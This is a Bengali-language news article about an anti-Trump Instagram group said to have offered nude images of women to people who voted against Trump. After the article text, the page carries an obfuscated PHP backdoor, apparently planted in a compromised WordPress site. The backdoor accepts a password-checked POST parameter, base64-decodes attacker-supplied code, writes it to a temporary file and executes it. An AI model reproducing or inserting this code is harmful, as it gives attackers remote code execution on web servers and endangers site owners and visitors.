সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

ট্রাম্পের বিরুদ্ধে ভোট দিলেই মিলবে নগ্ন নারীর ছবি!

file-photo_15216_1465121840আন্তর্জাতিক ডেস্ক : আমেরিকার প্রেসিডেন্ট নির্বাচনের সময় দিন দিন ঘনিয়ে আসছে। প্রেসিডেন্ট নির্বাচনে রিপাবলিকান মনোনয়ন প্রত্যাশী ডোনাল্ড ট্রাম্প। অন্যদিকে ডেমোক্রেট মনোনয়ন প্রত্যাশী দেশটির সাবেক পররাষ্ট্রমন্ত্রী ও ফাস্ট লেডি হিলারি ক্লিনটন।

নির্বাচনকে ঘিরে নানা ধরনের প্রতিশ্রতি দেয়া হচ্ছে। একের পর এক উল্টোপাল্টা কথা চলছে। নির্বাচনে ডোনাল্ড ট্রাম্পের বিদ্বেষীর সংখ্যা নেহাত কম নয়। তবে তার জনপ্রিয়তা কিন্তু দিনে দিনে বাড়ছেও।

ট্রাম্পকে মোকাবেলা করতে নানা ধরনের পরিকল্পনা হাতে নিয়েছে বিরোধী দলগুলো।

ট্রাম্প বিরোধী একটি গোষ্ঠী এনেছে নয়া টোপ! ট্রাম্পের বিরুদ্ধে ভোট দিলেই তাদেরকে দেয়া হবে নগ্ন নারীর ছবি!

জানা গেছে, ওইসব গোষ্ঠী প্রস্তাব করেছে, ট্রাম্পের বিরুদ্ধে যে কোনও প্রার্থীকে ভোট দিন। তার পরে এই গোষ্ঠীকে জানিয়ে দিন কার নগ্ন ছবি আপনি চান। ইনস্টাগ্রাম অ্যাকাউন্ট থেকে ভোটদাতার মোবাইলে চলে আসবে সেই কাঙ্ক্ষিত নারীর নগ্ন ছবি।

তবে এ ক্ষেত্রে প্রশ্ন উঠেছে, যদি কেউ কোনও সেলিব্রেটির নগ্ন ছবি চেয়ে বসেন (এবং কার্যক্ষেত্রে অনেকে তেমন করতেও পারেন), তাহলে কী হবে? অনেক সেলিব্রেটির নগ্ন ছবি (তাদের সম্মতিতেই তোলা) ইন্টারনেটে রয়েছে। কিন্তু যাদের নেই, এমন কোনও ব্যক্তিত্বের নগ্ন ছবি কেউ চাইলে কী হবে? তাহলে কি যারা প্রস্তাব করেছে, তারা কোনও অসদুপায় অবলম্বন করবে?

যে ইনস্টাগ্রাম পেজের মাধ্যমে এই প্রস্তাব দেয়া হয়েছিল, সেই পেজটি আপাতত নেই। তবে নিঃসন্দেহে, ট্রাম্পকে হারাতে এমন পন্থা বেশ অভিনব। যে গোষ্ঠীটি এই প্রস্তাব এনেছিল, তাদের কারও আপাতত দেখা মিলছে না বলেই খবর। তারা কোনও রাজনৈতিক দল বা পক্ষ নিয়ে কথা বলছে, এমনও শোনা যায়নি। তাদের লক্ষ্য স্রেফ একটিই, ট্রাম্পকে হারানো।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}